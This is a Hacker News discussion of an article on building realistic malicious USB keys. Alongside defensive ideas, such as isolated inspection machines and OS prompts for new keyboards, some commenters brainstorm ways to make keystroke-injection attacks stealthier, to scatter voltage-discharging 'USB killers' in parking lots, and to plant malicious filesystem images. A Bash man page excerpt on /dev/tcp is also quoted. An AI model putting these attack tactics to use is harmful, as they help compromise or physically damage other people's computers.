
What are malicious USB keys and how to create a realistic one? - liotier
https://www.elie.net/blog/security/what-are-malicious-usb-keys-and-how-to-create-a-realistic-one
======
s_kilk
A few years ago, a co-worker came back from a MongoDB event with a bag of
swag, including a MongoDB branded USB drive.

When he plugged it in, it acted as a keyboard and managed to open the browser
to a MongoDB promotional page.

Needless to say he freaked out a bit. Some marketing goons (not restricted to
the people at MongoDB) seem to think this kind of thing is a great promotional
tool.

Now that I think of it, my wife has a similar story about her University
distributing this same kind of USB/botnet thing to students.

~~~
ubernostrum
Who needs USB keys?

If you have Python (and preferably a handy virtualenv so you can throw it away
afterward), do `pip install rickroll`.

It will do exactly what it sounds like it should do.

------
stcredzero
_A HID-based attack has to spawn a terminal and very quickly inject a set of
commands that is very visible but only for a short period of time. Once the
attack has been carried out, there is nothing left to see, so this type of
attack is less obvious than the social engineering one._

MEMS microphones are tiny. It should be possible to combine data from that and
a light sensor, that would make an HID based attack far less likely to be
detected. The frequency profiles of keystrokes and someone pushing away an
office chair should be fairly easy do discern. You'd want to make it more
likely that the attack would occur after someone had left their desk.
(Hopefully with the machine unlocked.)

EDIT: Another idea: The USB key uses autorun to pop up what looks like a
spammy ad for a PC "cleaner" utility, or something you'd expect on a USB key
conference swag item. It's actual purpose is to cover up the shell's window,
or to contain the exploit itself.

~~~
ben174
I think it would be unlikely that the user would step away from his machine
before unplugging the device. If it was discovered on the ground, I would
think the likely sequence of events is: 1.) plug in, 2.) open finder, notice
nothing of interest. 3.) unplug, 4.) discard

~~~
stcredzero
So then, one tactic would be to fill it with nested folder after folder of
something that might be interesting. Like "Studio Rough.mp3" If you make it
large enough, a lot of people will procrastinate going through it all.

------
jotux
Making a mold and casting a custom case seems incredibly cumbersome compared
to just buying a USB key case and fitting the board into it:
[http://www.mouser.com/New-Age-
Enclosures/Enclosures/Enclosur...](http://www.mouser.com/New-Age-
Enclosures/Enclosures/Enclosures-Boxes-Cases/_/N-5g3p?P=1z0s1a1Z1z0vnv0)

~~~
throwaway2016a
If you look closely there might be two issues with that. First the device that
was used doesn't have the USB connector centered and second, the board sticks
out the edge a little so I would guess that it would need a larger than normal
case.

~~~
ajford
I think the parent might have been suggesting to develop your own board. Using
something like a USB enabled Atmel chip (ATMega32u2) should be relatively
simple, and there are plenty of HID libraries out there for it. If you were
trying for a bulk attack, or had the funds, this would be by far the best
solution.

~~~
Sanddancer
Even a non-bulk attack can be done pretty cheaply these days. Places like
seeed will do boards for a buck a piece if your design's small enough and you
get a ten pack. Doing smt work is honestly more bark than bite compared to
pth; a $20 toaster oven will work Well Enough for something like this.

~~~
jotux
For small run electronic prototyping it's hardly worth stuffing your own
boards any more. Macrofab or circuithub can get you fully assembled boards in
a few weeks in the $20-$50/unit range.

------
achr2
A really sneaky method would be to create a USB suppository, that looked like
a large USB key but would leave the active part inserted inside the socket
after the target pulls out the seemingly defective key.

~~~
mablap
And how is the port supposed the stay functional upon removal of the key? The
point of this attack is stealth.

------
mschuster91
There's a fourth class of malicious USB keys: those which discharge -100V
across the USB data lines, aka "usb killers". Drop a couple of these on a huge
parking lot to create a boatload of damage.

~~~
lightedman
Most ICs can handle at least -3000V static discharge. You need to pump about
-5000V to start doing real damage. Even LEDs are so robust now days as to take
3X-5X their rated forward voltage as reverse voltage regardless of what their
spec sheet says; I make 120V rectifiers from strings of them all the time.

~~~
yuubi
The 3 kV rating is most likely 3 kV on a human body model, which is a small
capacitor (few picofarads) with a series resistor. This says nothing about
what happens if you charge a large capacitor to 100v and then dump it through
as low a resistance as possible into the victim port.

------
Sanddancer
A zero-day key wouldn't have hardware costs that would be significantly
different from an HID key. A lot of microcontrollers will gladly announce
themselves to be whatever sort of device class you want them to be, and which
vendor and device IDs to use. Also, if you're worried about bulk, putting an
LED or something that flashes and looks pretty would also lower peoples'
guards as to why it's so big. USB hacking is an area where there are wide open
fields to play with.

------
rwmj
If one finds a USB key in a parking lot, is there any safe way to find out
what's on it?

~~~
jpindar
Plug it in a Raspberry Pi that's not connected to a network. After you're
done, destroy the Pi's SD card.

~~~
sean2
Put the SD card in Read only mode. Save yourself $10.

~~~
marcosdumay
Not enough by a far margin.

There's a computer inside that SSD that reads a soft signal to decide if
writing is enabled or not. More often than not its firmware is full of known
bugs.

~~~
colejohnson66
Correct me if I'm wrong, but that's because SD cards are half duplex, right?
So there's no way to disable writing through a "disconnect pins x and y"
because those pins are needed for reading.

~~~
paulannesley
SD cards implement a simple four-pin mode (SPI) for which there's public
documentation, and a proprietary mode parallelizing data over more pins. I
know more about the former than the latter, but it's probably a similar
situation.

SPI is full duplex; it has a dedicated line per data direction (MISO and
MOSI), however the same lines are used for commands and data. So with MOSI
(master out, slave in) physically disconnected, it'd be impossible to send the
command asking to read data, even though that data would be delivered on the
separate MISO (master in, slave out) line.

------
greggman
This might be a dumb question but wouldn't one solution to the HID-based
attack be for the OS to ask the user for permission to allow the new keyboard?
As in "New Keyboard Detected: Allow? Y/N" That wouldn't protect against driver
0 days but hey, one step at a time.

Do any OSes have an option to ask the user if connection is ok before allowing
it?

~~~
Benjammer
What if it's the first HID you connect? How do you confirm?

~~~
liotier
Whitelist if present at logon and confirm if inserted later ?

------
shawkinaw
Another good reason to run something like Little Snitch. Of course it's also
another good reason not to plug random USB keys into your computer.

It also seems to me like your OS should warn and confirm when a new input
source is detected.

------
Palomides
It's interesting to see mention of 0-days against USB drivers as a vector,
says "AFAIK, none of those have been publicly discussed." It seems very likely
there are vulnerable drivers.

~~~
blockoperation
Block layer or filesystem driver vulnerabilities would be even better – no
special hardware needed. Just buy a load of cheap flash drives, copy over your
malicious partition table or filesystem, and you're set.

~~~
Palomides
that seems a little optimistic, I figure there must be some moderately obscure
device drivers that get much less scrutiny.

~~~
Kalium
I suspect a lot of machines still have old floppy disk drivers...

------
DeepYogurt
Relevant to this discussion: [https://www.crowdsupply.com/inverse-path/usb-
armory](https://www.crowdsupply.com/inverse-path/usb-armory)

------
PokeAcer
I'm surprised nobody has made something for testing; how much would it take to
make something you plug a USB into and see what it does?

(I.E. "USB is typing"/"USB is doing")

~~~
thatcat
There is usbpcap which captures all the packets.

------
cheiVia0
He forgot the electrical attacks; fry your motherboard with a malicious USB
device.

~~~
Philipp__
I think that was not the point of this, let's call it "experiment". Although I
saw on Hackaday some "USB devices" that held huge capacitors in them, so when
you plug it in, caps would discharge and your motherboard would be damaged.

------
gwu78
"(I didn't know about it!)"

The reference is to the existence of /dev/tcp when using the "Bourne again"
shell. Some other large shells, and gawk, have this "feature" as well.

Then I noticed he is head of something technical at Google.

We are always reading about the rigor of this company's interviews in testing
candidates for practical knowledge.

I guess knowledge of important capabilities of widely/universally installed
software is not something they are testing for?

I mean, I am sure there are probably hundreds of employees there who know
these things. And they have some legendary programmers on the payroll. It is
like a miniature Hall of Fame of computer programming.

I am not even sure what this all means, but I find it interesting to see the
gaps in knowledge considering jobs with this company are so highly sought
after.

And they are entrusted with protecting an enormous quantity of other people's
data.

~~~
jerf
I just checked. The only presence of this feature in the Bash man page is
under REDIRECTION with the following, as the fifth and sixth elements of the
list:

    
    
         /dev/tcp/host/port
           If host is a valid hostname or Internet address, and port is an integer
           port number or service name, bash attempts to open the corresponding
           TCP socket.
         /dev/udp/host/port
           If host is a valid hostname or Internet address, and port is an integer
           port number or service name, bash attempts to open the corresponding
           UDP socket.
    

It's not a feature with a large documentation footprint. I've known about it
for a while, but mostly only in the context of security too. I have wondered
whether the majority use of this feature is to provide hacked network shells
before. It's probably a feature that never should have been added, though I
understand the initial appeal.

~~~
duskwuff
It's a terrible "feature". Not only is it poorly documented (as noted) and
redundant to common shell utilities (like nc), it's also implemented in a way
that confusingly implies that it's part of the operating system. (And if your
OS ever implemented a "real" /dev/tcp, I suspect that this Bash feature would
make it inaccessible.)

